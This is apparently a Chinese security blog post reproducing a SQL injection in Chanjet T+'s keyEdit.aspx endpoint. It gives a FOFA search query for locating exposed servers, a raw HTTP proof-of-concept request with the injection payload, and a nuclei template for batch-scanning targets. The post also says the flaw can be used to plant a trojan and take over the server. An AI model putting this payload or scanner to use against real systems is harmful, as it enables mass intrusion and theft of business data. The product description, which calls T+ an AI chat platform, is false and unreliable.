用友畅捷通T+ keyEdit sql注入漏洞复现

文摘   科技   2024-05-10 10:10   陕西  

免责声明

     请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。



01
0x01漏洞描述


畅捷通t+是一款智能人工智能通信服务平台,利用先进的自然语言处理和机器学习技术,为用户提供高效、便捷的交流和信息查询服务。用户可以通过文本、语音或图像等多种方式与畅捷通t+进行交流,获取信息、解决问题或进行娱乐互动。
畅捷通t+具有丰富的功能,包括但不限于日常问答、实时翻译、健康咨询、购物指导、旅行规划等。它能够快速准确地理解用户的需求,为用户提供个性化的服务和解决方案。

由于畅捷通T+的keyEdit.aspx接口处未对用户的输入进行过滤和校验,导致存在SQL 注入漏洞,可以通过该漏洞获取数据库中的信息,向服务器中写入木马,进一步获取服务器系统权限。





02
0x02 漏洞复现 
fofa语法:app="畅捷通-TPlus"

POC:GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1Host: x.x.x.xUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

03
0x03 nuclei批量验证脚本
id: changjietong_keyEdit_sqli
info: name: changjietong_keyEdit_sqli author: recjl severity: high description: description reference: - https:// tags: tags
requests: - raw: - |+ GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1 Host: {{Hostname}} Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http:///tplus/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: ASP.NET_SessionId=wla51k11mgrzdaydypk0muzb If-None-Match: W/"5b450e7e-666d" If-Modified-Since: Tue, 10 Jul 2018 19:52:30 GMT Connection: close

matchers-condition: and matchers: - type: word part: body words: - ion:u - type: status status:          - 200




END
点击蓝字  关注我们

爱喝酒烫头的曹操
主要分享一些漏洞挖掘小技巧,代码审计、web安全、内网渗透以及一些实战案例、快速获得edu及cnvd漏洞报送证书小技巧。
 最新文章